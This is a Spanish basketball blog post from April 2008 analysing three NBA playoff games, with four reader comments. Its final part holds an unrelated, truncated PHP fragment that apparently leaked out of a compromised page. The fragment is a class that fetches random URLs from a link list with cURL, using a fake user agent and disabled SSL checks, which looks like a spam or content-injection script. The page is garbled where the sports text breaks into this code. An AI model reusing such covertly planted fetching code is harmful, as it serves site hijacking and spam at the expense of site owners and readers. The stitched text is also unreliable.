Ha llegado el relevo

23 de April de 2008 por TheDeerHunter

by Queko & TheDeerHunter

Ha llegado el relevo (DAL 103 – NOH 127 )

Se estaban quedando atrás los Mavericks durante la fiebre del trade que hubo en la conferencia oeste a mitad de la regular season. Y como Mark Cuban no es menos que nadie, faltaría plus, se hizo con Jason Kidd, el mejor base de la liga con permiso de Steve Nash aunque ya se vislumbraba en el momento del trade que esta afirmación se estaba quedando peligrosamente obsoleta. Un tal Chris Paul estaba llevando a los New Orleans Hornets a cotas insospechadas, y la cosa se ha ido confirmando poco a poco, o mucho a mucho. Los Hornets lucharon el primer puesto del Oeste hasta el final mientras los Mavericks lucharon por la séptima plaza. Chris Paul daba clases día sí, día también, mientras Kidd llegaba a los playoffs gracias principalmente a que un renqueante Nowitzki se empeñaba en ello. El destino, o los propios Hornets me atrevería a decir, decidió enfrentarlos en la primera eliminatoria del playoff.

Y aquello que los legionarios romanos esperaban como agua de mayo en las guarniciones de Petibonum, Laudanum, Babaorum y Aquarium, se confirma. Ha llegado el relevo. Chris Paul se está comiendo a Jason Kidd, los Hornets están pasando por encima de los Mavericks, y si no he hablado nada del partido, es porque no ha tenido más historia que la que he contado. Ha llegado Chris Paul, que no es romano, pero si lo fuera, hasta Óbelix estaría preocupado por cómo dirige y lidera a sus tropas. Sus 32 puntos y 17 asistencias, que son récord de la franquicia en playoffs, lo dicen todo. O mucho cambia la serie al llegar a Dallas, o los Hornets llegarán a la semifinal de conferencia por la vía rápida.

La trampa de la tela de araña (PHX 96 – SA 102)

Durante el primer “partidazo” de la serie, Suns dió algunas muestras de superioridad a pesar de la derrota. Se respiraba la sensación que Spurs había superado la prueba con cierta dosis de buena suerte y estirando hasta el límite las posibilidades de su equipo. Anoche Amare y sus compañeros salieron con la intención de demostrarlo desde el principio y los Suns explotaron sus nuevas armas hasta la obsesión: Abuso del juego interior donde se sienten poderosos. Balones a Amare, balones a Shaq… Dentro, dentro y dentro. No podía fallar.

La táctica no falló la primera parte. 61 puntos con porcentajes de tiro altísimos, 25 de ellos de un sólo hombre, Stoudemire, jugando casi perfecto. Nadie se puso nervioso, sin embargo, en San Antonio. Caras de tensión, pero de confianza. Suns había jugado bien sus cartas, pero el partido seguía vivo.

Al principio de la segunda parte todo cambió. De repente, en la zona de Spurs desaparecieron los espacios con todo el equipo dentro agobiando a las torres de Phoenix. Todo el equipo menos uno, que le hacía pasar las de Caín a Steve Nash para distribuir el juego y también para encontrar canasta. El resto del equipo, sin contar Grant Hill con problemas físicos, inoperante, pero es lo que pasa cuando nadie se juega apenas tiros durante una parte entera… cuando los necesitas o están fríos o no están.

San Antonio anoche no tenía ningún problema en hacer faltas. El “Hack a Shaq” se convirtió en el “Hack a Shaq&Stat” ¡ya en el tercer cuarto!! La tela de araña de Popovic estaba tan bien dispuesta que cada defensa era falta, o casi falta, o como mínimo defensa dura. De esta manara los Suns dejaron de jugar en ataque y se encomendaron a los tiros libres. Y lo cierto es que no es la mejor arma de la que disponen ni Shaq ni Stat del tal manera que cada punto era como un parto. 35ptos de los Suns en toda la segunda parte. No hubo partido. Y mientras, los Spurs encadenaba ataques rápidos y directos, sin complicarse, bloqueo directo y buscar canasta. En este estilo de juego Ginóbili se mueve como pez en el agua y cuajó una actuación casi perfecta.

A pesar del estrecho resultado final durante toda la segunda parte San Antonio dio la sensación de completa confianza en sus posibilidades. Duncan relajado, sin alardes, Parker y Ginobili destrozando en ataque.
Phoenix con muchas dudas en las posibilidades de su nuevo juego basado en el dominio interior ya que como se temía, algún jugador (Barbosa) no está preparado para el juego estático. Las caras de sufrimiento del banquillo en el tercer cuarto lo resumen todo. Popovic puede hacer ese tipo de defensas “de hachazo” porque anoche utilizó hasta 11 jugadores, hecho impensable para D’Antoni.

Por el bien del espectáculo… que esto cambie en Phoenix.

Morir con las botas puestas (TOR 103 – ORL 104)

Los Raptors dieron anoche ciertas muestras de mejoría que les permiten afrontar con algo de optimismo los próximos partidos de la serie en el Air Canada Center. El principal acierto de Toronto fue recuperar alguna de las señas de identidad en las que se ha fundamentado este equipo en el pasado reciente. En realidad, los Raptors nunca se han basado en fuertes sistemas defensivos, menos aún en alternativas para frenar a individualidades concretas (a excepción quizás de Garbajosa que el año pasado fue utilizado en ocasiones con acierto para tal fin). Es un equipo que no está físicamente construido para ello. El ideal de juego que más éxitos le ha proporcionado a este equipo y el propio diseño del mismo ha ido siempre más en la línea del aspecto colectivo/solidario con la implicación de un alto número de jugadores titulares y reservas manteniendo una marcada tendencia ofensiva. Esto ha sido todo lo que se ha perdido en la última fase de la temporada y, sobre todo en el primer partido de play-offs en el que se obsesionaron de tal manera con Dwight Howard que olvidaron que los demás jugaban… y, de paso, también se olvidaron de cómo jugaban ellos mismos en ataque.

Anoche, todo volvió a tener un poco más de coherencia. Howard te destroza (inevitable), pero al menos el resto no te cose a triples durante todo el partido, y en ataque se recuperaron algunas sensaciones de algunos tiempos no tan lejanos. Consecuencia: claras opcines de victoria, que no es poco tal y como los vimos el otro día.

Aspectos a tener en cuenta:

  • Toronto sigue saliendo dormido los primeros cuartos: 35 puntos de Orlando ayer y 43 en el primer partido.
  • Cuando 4 de los 5 titulares no aportan apenas nada y 3 reservas se salen y casi te ganan el encuentro hay que hacerselo mirar. Caso flagrante el de Nesterovic, que lo sacas a jugar 5 minutos… los que tardas en darte cuenta que la has cagado. Rectificar es de sabios.
  • Bosh lleva una temporadita tirando balones fuera y echando todas las culpas a los demás (menos él que no tiene la culpa de nada) cuando debería ser el líder tanto a las duras como a las maduras. Lo peor para Bosh es que da la sensación de que no deberían haberle dado el balón a él en el último tiro.
  • Se ncesita un ‘3’ verdadero porque Bargnani NO lo es, aunque en realidad, últimamente no tenemos claro qué es exáctamente Bargnani.
  • Dirección del equipo. Aquí es donde realmente da la sensación que Toronto quiere “Morir con las botas puestas” (no sólo en la recuperación de sus principios básicos) TJ Ford sí o sí, aunque manden la eliminatoria al carajo. En teoría la vuelta de TJ Ford al quinteto titular perseguía una mejora global del equipo pero creo que ya se ha demostrado que esa mejora NO va a tener lugar de esta manera. De todas formas, Calderón tiene parte de culpa por lo mal que ha asimilado esta situación. Anoche despertó por fin, pero debería haber entendido mucho antes de que no es ninguna deshonra jugar de sexto hombre. Que se lo digan a Manudo o a Papalukas…. o sin ir tan lejos, que recuerde su juego antes de la lesión de Ford.
Comenta

4 comentarios a esta entrada

  1. telekoman dice:
    #1

    Que bueno lo del Relevo y los galos. que bien traido está. Aunque me parece que esta vez los que tienen la poción mágica son los Hornets y el druida se llama Byron Scott.

      Citar

  2. TheDeerHunter dice:
    #2

    Por lo que se comenta por la prensa, Sam Mitchell está llegando a algunas conclusiones a las que todos apuntamos (no hacía falta ser Einstein, vamos… sólo un poquito de sentido común baloncestístico) más le vale a él y a Toronto que tenga capacidad de autocrítica y sepa cambiar a tiempo.

    Lo de Dallas, lo veo muy mal.
    Han perdido la posibilidad de beneficiarse de esa teórica inexperiencia de New Orleans presionandolos en los dos primeros partidos.
    Las derrotas han sido muy claras con actuaciones sonrojantes de casi todos excepto del de siempre, que nunca falla. El alemán debe de estar acordándose de varias generaciones familiares de sus compañeros, habiendo arriesgado tanto para que ahora todos le fallen.
    El día que Terry y Brandon Bass dan un paso adelante el resto lo da hacia atrás… y mientras tanto Hornets funcionando como un reloj.
    Cada partido que pasa ellos cojen más confianza y Dallas la pierde, con lo cogido ahora mismo con hilos que están.
    La historia todavía no ha acabado, pero cada vez parece más claro que el teórico equipazo que tiene Dallas es únicamente eso, teórico.
    Y también parece claro que ahora mismo entre Kidd y CP3 hay bastante más que sutiles diferencias en el color de piel. Lástima de duelo.

      Citar

  3. MagicJohnson32 dice:
    #3

    Yo, antes de ser tan crítico con los Mavs, pensaría si no es que los Hornets son realmente muuuuuy buenos. Cuando tienes un cuarteto de ese nivel que no falla nunca, es que eres muy bueno. De todos modos, no es fácil ganar en el Cuban Arena, jeje.

      Citar

  4. Viva_Dirk dice:
    #4

    Hombre Magic, todos los palos que le caigan a Kidd y Howard son pocos. El primero me parece normal que no pueda frenar a Paul, ahora de ahí a las exhibiciones que está dando va un trecho, pero lo mas grave es que en ataque está muy mal, 18 puntos en dos partidos, si me dicen que Devin Harris lo haría peor, no me lo creo. Y Howard cada vez tiene mas los dias contados en Dallas, tiene seguramente al defensor mas flojo de los Hornets y su trabajo en defensa es básicamente que Pedja no tire cómodo, pues ni una cosa ni la otra, ni mas ni menos que 7 de 26 acumula en tiros.

    En la eliminatoria de Orlando estamos pasando un poco por alto a Howard, no recuedo tal superioridad en la zona desde los buenos tiempos de Shaq, está acertado desde la linea de personal y sus números no se veian desde Chamberlain, 27 puntos y 21 rebotes con un 66.7% en tiros es de otro planeta.

    Los Suns me están decepcionando un poco, si Popovich se quiere poner a pegar palos en el tercer cuarto que lo haga, pero tu ya que no gastas energias en atacar tienes que defender a muerte.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>